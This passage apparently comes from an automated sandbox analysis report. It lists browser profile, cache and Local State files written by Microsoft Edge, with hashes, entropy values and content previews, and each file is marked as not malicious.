                                MD5:C2FD71D365B08C40732A1355CFC108E6
                                SHA1:CA930C6582B237A1B29847E549D424FA3560A0C4
                                SHA-256:1BBDDB749B49D5844A2563019618A9796A01EF16F1769DD4A2473D55AD4B9F62
                                SHA-512:0955FABBFD3DC198E84C669480BB5A4C5575A0F01BACE919FE796FE260182F98CE34AB0D652240A30248C4853228065CA7045956A4DC937D17D344720171C891
                                Malicious:false
                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13361265752337334","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","5826"],"daily_received_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","5826"],"last_update_date":"133407612

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\e06a5628-f0ec-4d46-9a61-1a6ab6a449a0.tmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):9160
                                Entropy (8bit):5.178979613597635
                                Encrypted:false
                                SSDEEP:96:sVSqlPJ1Ceb9bsYrdvXmc9bkO1LVBXZYYYsY5Th6Cp9/x+6M8muecmAeChe4zvrI:sVSUJIYrdvtf56YYsYPpj+FVAFUFBf
                                MD5:412D62961B0AE94821E7430E47BE37A4
                                SHA1:07D1431CA89E78DF5B89C5B6F8E41ED40B34CEB7
                                SHA-256:575C80197E64DAB10CEA36A93441081E858438B2B2EBB07B7406E8436587C35F
                                SHA-512:8A0399C7F4051ACD8ED2B83AED5B4ADD391BF0E4F50CC65CC6BDF8F258D080FD73450F74D1CED3EA133E75BB83A2F64CE12660566C8AA8D11C7750A9A013562F
                                Malicious:false
                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13361265752337334","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false},"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","5826"],"daily_received_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\000001.dbtmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):16
                                Entropy (8bit):3.2743974703476995
                                Encrypted:false
                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                MD5:46295CAC801E5D4857D09837238A6394
                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                Malicious:false
                                Preview:MANIFEST-000001.

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\CURRENT (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):16
                                Entropy (8bit):3.2743974703476995
                                Encrypted:false
                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                MD5:46295CAC801E5D4857D09837238A6394
                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                Malicious:false
                                Preview:MANIFEST-000001.

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):41
                                Entropy (8bit):4.704993772857998
                                Encrypted:false
                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                Malicious:false
                                Preview:.|.."....leveldb.BytewiseComparator......

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000001.dbtmp

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):16
                                Entropy (8bit):3.2743974703476995
                                Encrypted:false
                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                MD5:46295CAC801E5D4857D09837238A6394
                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                Malicious:false
                                Preview:MANIFEST-000001.

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENT (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):16
                                Entropy (8bit):3.2743974703476995
                                Encrypted:false
                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                MD5:46295CAC801E5D4857D09837238A6394
                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                Malicious:false
                                Preview:MANIFEST-000001.

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:OpenPGP Secret Key
                                Category:dropped
                                Size (bytes):41
                                Entropy (8bit):4.704993772857998
                                Encrypted:false
                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                Malicious:false
                                Preview:.|.."....leveldb.BytewiseComparator......

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_0

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.01057775872642915
                                Encrypted:false
                                SSDEEP:3:MsFl:/F
                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                Malicious:false
                                Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_1

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):270336
                                Entropy (8bit):8.280239615765425E-4
                                Encrypted:false
                                SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_2

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.011852361981932763
                                Encrypted:false
                                SSDEEP:3:MsHlDll:/H
                                MD5:0962291D6D367570BEE5454721C17E11
                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\data_3

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.012340643231932763
                                Encrypted:false
                                SSDEEP:3:MsGl3ll:/y
                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\index

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                Category:dropped
                                Size (bytes):262512
                                Entropy (8bit):8.81240594570408E-4
                                Encrypted:false
                                SSDEEP:3:LsNlA/:Ls3A/
                                MD5:C255E02AFC17F19A3083D6EFB7780D80
                                SHA1:783EA7AC08AA1451B1788ED807D210465785F0E3
                                SHA-256:DA3435B9C990D717114F91092D7006F0A0E1ABA86D35629249B95B58A4A58574
                                SHA-512:E7E2414B94167DD73BE87352AB51C3277D19267BD0F069A4C639F6E96F2FFFEEE21E583054EF9A910D090A58FB96D50E2BBC01AFEE92960F65B1F76C1EDE5512
                                Malicious:false
                                Preview:........................................r....x/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_0

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.01057775872642915
                                Encrypted:false
                                SSDEEP:3:MsFl:/F
                                MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                Malicious:false
                                Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_1

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):270336
                                Entropy (8bit):8.280239615765425E-4
                                Encrypted:false
                                SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_2

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.011852361981932763
                                Encrypted:false
                                SSDEEP:3:MsHlDll:/H
                                MD5:0962291D6D367570BEE5454721C17E11
                                SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\data_3

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8192
                                Entropy (8bit):0.012340643231932763
                                Encrypted:false
                                SSDEEP:3:MsGl3ll:/y
                                MD5:41876349CB12D6DB992F1309F22DF3F0
                                SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                Malicious:false
                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\GraphiteDawnCache\index

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                Category:dropped
                                Size (bytes):262512
                                Entropy (8bit):8.81240594570408E-4
                                Encrypted:false
                                SSDEEP:3:LsNlAqlI/l:Ls3Aqq/l
                                MD5:68F430C349A3C7AC23E9AC0CED084ADC
                                SHA1:3063A502DDC8939773A50FBAFB59FAF3E0698FD2
                                SHA-256:92F6193A671D8A80158EB51F3DB03D9F3D3162E63AAACE28A907E4C11E47A427
                                SHA-512:273CE115785CE9D35DF1ECF3B4A0A90AE194EC3C571C52AE78A9BD4A59ED9D5EBB56F8DF6B9CD13D4B327109845B0C7EEB420D3C16247463CF06FCBC5448ED37
                                Malicious:false
                                Preview:........................................>....x/.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):120
                                Entropy (8bit):3.32524464792714
                                Encrypted:false
                                SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                MD5:A397E5983D4A1619E36143B4D804B870
                                SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                Malicious:false
                                Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):13
                                Entropy (8bit):2.7192945256669794
                                Encrypted:false
                                SSDEEP:3:NYLFRQI:ap2I
                                MD5:BF16C04B916ACE92DB941EBB1AF3CB18
                                SHA1:FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
                                SHA-256:7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
                                SHA-512:F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
                                Malicious:false
                                Preview:117.0.2045.47

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):6820
                                Entropy (8bit):5.796344557668211
                                Encrypted:false
                                SSDEEP:192:akxMnE7IeiRUEhb6qRAq1k8SPxVLZ7VTiq:akxcEefb6q3QxVNZTiq
                                MD5:CCC9724B2AA784554038AF9F1576D6D4
                                SHA1:BB1A1416148C9BA42A03E960669E78E566CD3F66
                                SHA-256:20828C1956108E67EBF1DA8D6EF22658DC701F425588412F43BED0F1BCF8F8B0
                                SHA-512:81FBFB36F72922D2A68E87899D1A2AEB8DB5E56D19029609954D73AC26071F93A00629C4BDE7B3B2A5B83E9350B261A64A6759C3463D06E46F85016EF8C4C37E
                                Malicious:false
                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADi3P1FI9wIQpckKbHwXhRjEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADzNuOLP35QNUWfOLaAgGz8YgONSe4BeQZ5No4iKuXj9gAAAAA

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF30f43.TMP (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):6820
                                Entropy (8bit):5.796344557668211
                                Encrypted:false
                                SSDEEP:192:akxMnE7IeiRUEhb6qRAq1k8SPxVLZ7VTiq:akxcEefb6q3QxVNZTiq
                                MD5:CCC9724B2AA784554038AF9F1576D6D4
                                SHA1:BB1A1416148C9BA42A03E960669E78E566CD3F66
                                SHA-256:20828C1956108E67EBF1DA8D6EF22658DC701F425588412F43BED0F1BCF8F8B0
                                SHA-512:81FBFB36F72922D2A68E87899D1A2AEB8DB5E56D19029609954D73AC26071F93A00629C4BDE7B3B2A5B83E9350B261A64A6759C3463D06E46F85016EF8C4C37E
                                Malicious:false
                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADi3P1FI9wIQpckKbHwXhRjEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADzNuOLP35QNUWfOLaAgGz8YgONSe4BeQZ5No4iKuXj9gAAAAA

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF30f72.TMP (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):6820
                                Entropy (8bit):5.796344557668211
                                Encrypted:false
                                SSDEEP:192:akxMnE7IeiRUEhb6qRAq1k8SPxVLZ7VTiq:akxcEefb6q3QxVNZTiq
                                MD5:CCC9724B2AA784554038AF9F1576D6D4
                                SHA1:BB1A1416148C9BA42A03E960669E78E566CD3F66
                                SHA-256:20828C1956108E67EBF1DA8D6EF22658DC701F425588412F43BED0F1BCF8F8B0
                                SHA-512:81FBFB36F72922D2A68E87899D1A2AEB8DB5E56D19029609954D73AC26071F93A00629C4BDE7B3B2A5B83E9350B261A64A6759C3463D06E46F85016EF8C4C37E
                                Malicious:false
                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADi3P1FI9wIQpckKbHwXhRjEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADzNuOLP35QNUWfOLaAgGz8YgONSe4BeQZ5No4iKuXj9gAAAAA

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3374d.TMP (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):6820
                                Entropy (8bit):5.796344557668211
                                Encrypted:false
                                SSDEEP:192:akxMnE7IeiRUEhb6qRAq1k8SPxVLZ7VTiq:akxcEefb6q3QxVNZTiq
                                MD5:CCC9724B2AA784554038AF9F1576D6D4
                                SHA1:BB1A1416148C9BA42A03E960669E78E566CD3F66
                                SHA-256:20828C1956108E67EBF1DA8D6EF22658DC701F425588412F43BED0F1BCF8F8B0
                                SHA-512:81FBFB36F72922D2A68E87899D1A2AEB8DB5E56D19029609954D73AC26071F93A00629C4BDE7B3B2A5B83E9350B261A64A6759C3463D06E46F85016EF8C4C37E
                                Malicious:false
                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADi3P1FI9wIQpckKbHwXhRjEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADzNuOLP35QNUWfOLaAgGz8YgONSe4BeQZ5No4iKuXj9gAAAAA

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF36042.TMP (copy)

                                Download File
                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                File Type:JSON data
                                Category:dropped
                                Size (bytes):6820
                                Entropy (8bit):5.796344557668211
                                Encrypted:false
                                SSDEEP:192:akxMnE7IeiRUEhb6qRAq1k8SPxVLZ7VTiq:akxcEefb6q3QxVNZTiq
                                MD5:CCC9724B2AA784554038AF9F1576D6D4
                                SHA1:BB1A1416148C9BA42A03E960669E78E566CD3F66
                                SHA-256:20828C1956108E67EBF1DA8D6EF22658DC701F425588412F43BED0F1BCF8F8B0
                                SHA-512:81FBFB36F72922D2A68E87899D1A2AEB8DB5E56D19029609954D73AC26071F93A00629C4BDE7B3B2A5B83E9350B261A64A6759C3463D06E46F85016EF8C4C37E
                                Malicious:false
                                Preview:{"browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"fire_local_softlanding_notification":false,"fre":{"soft_landing_bubble":{"bubble_response":0,"has_user_seen_bubble":true,"is_bubble_triggered":0}},"hardware_acceleration_mode_previous":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"last_edgeuwp_pin_migration_on_edge_version":"92.0.902.67","last_edgeuwp_pin_migration_on_os_version":"10 OS Version 2009 (Build 19045.2006)","last_edgeuwp_pin_migration_success":false},"os_crypt":{"audit_enabled":true,"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADi3P1FI9wIQpckKbHwXhRjEAAAAB4AAABNAGkAYwByAG8AcwBvAGYAdAAgAEUAZABnAGUAAAAQZgAAAAEAACAAAADzNuOLP35QNUWfOLaAgGz8YgONSe4BeQZ5No4iKuXj9gAAAAA

                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF36a92.TMP (copy)

                                Download File
